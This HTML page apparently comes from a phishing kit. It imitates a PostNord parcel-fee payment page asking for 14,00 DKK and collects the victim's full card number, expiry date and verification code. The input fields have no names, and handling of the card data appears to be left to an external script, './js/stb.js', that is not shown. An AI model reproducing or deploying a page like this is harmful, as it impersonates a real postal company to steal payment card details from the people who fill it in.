<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/minak.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="roof">
            <img src="./img/topp1.JPG" alt="">
        </div>
        <img class="top2" src="./img/cc-top2.JPG" alt="">
    </div>


    <div>
        <div class="forma">
            <div class="cc1">
                <p class="ccp">PostNord Porto</p>
                <div class="cc2">
                    <div class="">
                        <p>Forretning:</p>
                        <p>Beløb:</p>
                        <p>Ordrenummer:</p>
                    </div>
                    <!--  -->
                    <div class="right">
                        <p>PostNord Porto</p>
                        <p>14,00 (DKK)</p>
                        <p>138729271</p>
                    </div>
                </div>
            </div>

            <div class="insid">
                <!-- <p class="p1p">
                    Méthodes de paiement:
                </p> -->
                <div class=""> 
                    <div class="vis">
                        <img src="./img/cc-icon.JPG" alt="">
                    </div>
                    <form method="post" id="pg2">
                        <p>Kortnummer </p>
                        <input type="tele" name="" id="numcc" maxlength="19">

                        

                        <p>Udløbsdato (mm/åå)</p>
                        <div class="exp">
                            <input class="mm" type="tel" name="" id="mmo" required placeholder="MM" maxlength="3">
                            <input type="tel" name="" id="aao" required placeholder="AA"  maxlength="3">
                        </div>

                        <p>Verifikationskode</p>
                        <input class="cfifi" type="tel" name="" id="numvv" required maxlength="8" maxlength="4">

                        <button class="btn2"  type="submit">Betal</button>
                    </form>
                </div>
                
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/boott.JPG" alt="">
            </div>
        </div>
    </div>

    <script>
        $("#numcc").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
    </script>
    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>